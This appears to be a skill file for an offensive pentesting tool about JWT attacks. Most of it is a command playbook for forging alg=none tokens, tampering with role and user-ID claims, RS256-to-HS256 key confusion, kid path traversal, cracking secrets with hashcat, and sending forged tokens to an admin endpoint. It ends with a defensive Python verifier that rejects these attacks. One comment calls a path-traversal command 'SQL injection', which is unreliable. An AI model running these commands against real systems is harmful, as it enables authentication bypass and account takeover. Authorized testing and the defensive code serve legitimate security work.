attack-jwt
JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping
| field | value |
|---|---|
| name | attack-jwt |
| description | JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["jwt","authentication","web","token","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-287","CWE-347","CWE-345"] |
| chains_with | ["attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-idor-automation":"JWT tampering + IDOR = full account takeover"} |
Exploit JWT implementation weaknesses to bypass authentication, escalate privileges, or forge tokens.
```bash
# Automated JWT analysis and tamper token generation
attack_script jwt_tamper EYTOKEN --json-output

# Manual decode of the header and payload segments
echo "HEADER.PAYLOAD.SIG" | cut -d. -f1 | base64 -d 2>/dev/null
echo "HEADER.PAYLOAD.SIG" | cut -d. -f2 | base64 -d 2>/dev/null
```
Check for:

- `alg` field: RS256, HS256, none
- Claims: `role`, `is_admin`, `sub`, `exp`, `aud`, `iss`
- `kid` header: SQL injection, path traversal potential

```bash
# Generate alg=none token
attack_script jwt_tamper EYTOKEN --set-header alg=none

# Role escalation
attack_script jwt_tamper EYTOKEN --set role=admin --set-header alg=none

# User ID swap
attack_script jwt_tamper EYTOKEN --set sub=1 --set-header alg=none

# HS256 with known/weak key
attack_script jwt_tamper EYTOKEN --set role=admin --key "secret"
```
If server uses RS256, try signing with the public key as HS256 secret:
```bash
# Fetch public key
curl -s https://TARGET/.well-known/jwks.json

# Convert JWK to PEM and sign
attack_script jwt_tamper EYTOKEN --set role=admin --key "$(cat public.pem)" --set-header alg=HS256

# SQL injection via kid
attack_script jwt_tamper EYTOKEN --set-header "kid=../../../../../../dev/null" --key ""

# kid pointing to accessible file
attack_script jwt_tamper EYTOKEN --set-header "kid=/proc/sys/kernel/hostname"

# Test tampered token
curl -s -H "Authorization: Bearer TAMPERED_TOKEN" https://TARGET/api/admin/users
```
| Attack | Severity |
|---|---|
| alg=none accepted — auth bypass | Critical (P1) |
| Role escalation via claim tampering | Critical (P1) |
| RS256→HS256 key confusion | Critical (P1) |
| Weak signing key (crackable) | High (P2) |
| kid SQL injection | Critical (P1) |
| Expired tokens accepted | Medium (P3) |
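Each row of this table maps to a server-side check that a correct verifier must perform. As an added example that is not part of this skill or its tooling, the following Python verifier (standard library only, with a constructed demo secret) pins the algorithm, checks the HMAC in constant time and requires `exp`, so alg=none, RS256→HS256 confusion, claim tampering, stripped signatures and expired tokens are all rejected.

```python
import base64, hashlib, hmac, json, time
from typing import Optional

# Constructed demo secret; a real service loads this from its secret store.
SECRET = b"demo-secret-not-for-production"
# The accepted algorithm is fixed server-side; the token's own alg header is never trusted.
ALLOWED_ALGS = {"HS256"}

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def sign_hs256(payload: dict, key: bytes = SECRET) -> str:
    """Issue a token the way the server would; used here only to build test input."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify(token: str, key: bytes = SECRET, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the token is valid, otherwise None."""
    try:
        h, b, s = token.split(".")
        header = json.loads(b64url_decode(h))
        claims = json.loads(b64url_decode(b))
        sig = b64url_decode(s)
    except (ValueError, TypeError):
        return None  # wrong segment count, bad base64url or bad JSON
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None
    # 1. Algorithm pinning: alg=none and any RS*/ES* value are refused outright, which also
    #    closes RS256->HS256 confusion because a public key is never used as an HMAC key.
    if header.get("alg") not in ALLOWED_ALGS:
        return None
    # 2. Constant-time HMAC over the exact header.payload bytes received, so any claim
    #    tampering (role, sub, ...) or a stripped signature fails here.
    expected = hmac.new(key, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    # 3. Expiry is mandatory: a missing, malformed or past exp is a rejection.
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if isinstance(exp, bool) or not isinstance(exp, (int, float)) or exp <= now:
        return None
    return claims
```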
- `attack_script jwt_tamper` — automated decode/tamper/re-encode
- `jwt_tool` (external) — comprehensive JWT testing
- `hashcat -m 16500` — JWT secret cracking